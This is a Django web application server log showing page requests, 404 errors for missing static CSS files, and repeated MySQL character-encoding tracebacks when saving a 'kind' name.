+[pid: 2069|app: 0|req: 255/332] 219.228.146.156 () {48 vars in 1029 bytes} [Thu Jan 14 07:51:29 2021] POST /announcement/ => generated 27 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 256/333] 219.228.146.156 () {40 vars in 935 bytes} [Thu Jan 14 07:51:29 2021] GET /announcement/ => generated 8247 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 257/334] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 07:51:29 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 258/335] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 07:51:29 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 259/336] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 07:51:29 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 260/337] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 07:51:29 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 261/338] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:51:29 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 262/339] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:51:29 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 263/340] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 07:51:29 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 264/341] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 07:51:29 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 265/342] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 07:51:29 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 266/343] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 07:51:53 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 2069|app: -1|req: -1/344] 219.228.146.156 () {40 vars in 865 bytes} [Thu Jan 14 07:51:53 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/345] 219.228.146.156 () {40 vars in 887 bytes} [Thu Jan 14 07:51:53 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/346] 219.228.146.156 () {40 vars in 869 bytes} [Thu Jan 14 07:51:53 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/347] 219.228.146.156 () {40 vars in 867 bytes} [Thu Jan 14 07:51:53 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/348] 219.228.146.156 () {40 vars in 873 bytes} [Thu Jan 14 07:51:53 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/349] 219.228.146.156 () {40 vars in 848 bytes} [Thu Jan 14 07:51:53 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/350] 219.228.146.156 () {40 vars in 846 bytes} [Thu Jan 14 07:51:53 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/351] 219.228.146.156 () {40 vars in 864 bytes} [Thu Jan 14 07:51:54 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/352] 219.228.146.156 () {40 vars in 862 bytes} [Thu Jan 14 07:51:54 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/353] 219.228.146.156 () {40 vars in 854 bytes} [Thu Jan 14 07:51:54 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/354] 219.228.146.156 () {40 vars in 908 bytes} [Thu Jan 14 07:51:54 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: 0|req: 267/355] 219.228.146.156 () {40 vars in 921 bytes} [Thu Jan 14 07:51:56 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 268/356] 219.228.146.156 () {40 vars in 918 bytes} [Thu Jan 14 07:51:59 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 269/357] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 07:52:08 2021] POST /login/ => generated 27 bytes in 22 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 270/358] 219.228.146.156 () {40 vars in 913 bytes} [Thu Jan 14 07:52:09 2021] GET /home/ => generated 7944 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 271/359] 219.228.146.146 () {42 vars in 934 bytes} [Thu Jan 14 07:52:40 2021] GET /kind-manage/ => generated 8286 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 272/360] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:52:40 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 273/361] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:52:40 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 274/362] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:52:40 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 275/363] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:52:40 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 276/364] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:52:40 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 277/365] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:52:40 2021] GET /static/css/spinners.css => generated 3516 bytes in 15 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 278/366] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:52:40 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 279/367] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:52:40 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 280/368] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:52:40 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 281/369] 219.228.146.146 () {40 vars in 905 bytes} [Thu Jan 14 07:52:49 2021] GET /kind-manage/? => generated 8286 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Internal Server Error: /kind-manage/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 541, in kind_manage
+ models.Kind.objects.create(k_name=k_name)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1")
+[pid: 2069|app: 0|req: 282/370] 219.228.146.146 () {48 vars in 987 bytes} [Thu Jan 14 07:52:49 2021] POST /kind-manage/ => generated 206956 bytes in 153 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 283/371] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:52:50 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 284/372] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:52:50 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 285/373] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:52:50 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 287/374] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:52:50 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 35 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 288/375] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:52:50 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 288/376] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:52:50 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 28 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 289/377] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:52:50 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 290/378] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:52:50 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 291/379] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:52:50 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /
+[pid: 2069|app: 0|req: 292/380] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 07:52:58 2021] GET / => generated 3429 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 293/381] 219.228.146.146 () {42 vars in 936 bytes} [Thu Jan 14 07:53:00 2021] GET /kind-manage/? => generated 8286 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 294/382] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:53:00 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 295/383] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:53:00 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 296/384] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:53:00 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 297/385] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:53:00 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 298/386] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:53:00 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 299/387] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:53:00 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 16 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 300/388] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:53:00 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 301/389] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:53:00 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 302/390] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:53:00 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 303/391] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 07:53:02 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 304/392] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 07:53:13 2021] POST /login/ => generated 27 bytes in 24 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 305/393] 219.228.146.156 () {40 vars in 913 bytes} [Thu Jan 14 07:53:13 2021] GET /home/ => generated 7944 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 307/394] 219.228.146.146 () {40 vars in 905 bytes} [Thu Jan 14 07:53:23 2021] GET /kind-manage/? => generated 8286 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Internal Server Error: /kind-manage/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 541, in kind_manage
+ models.Kind.objects.create(k_name=k_name)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
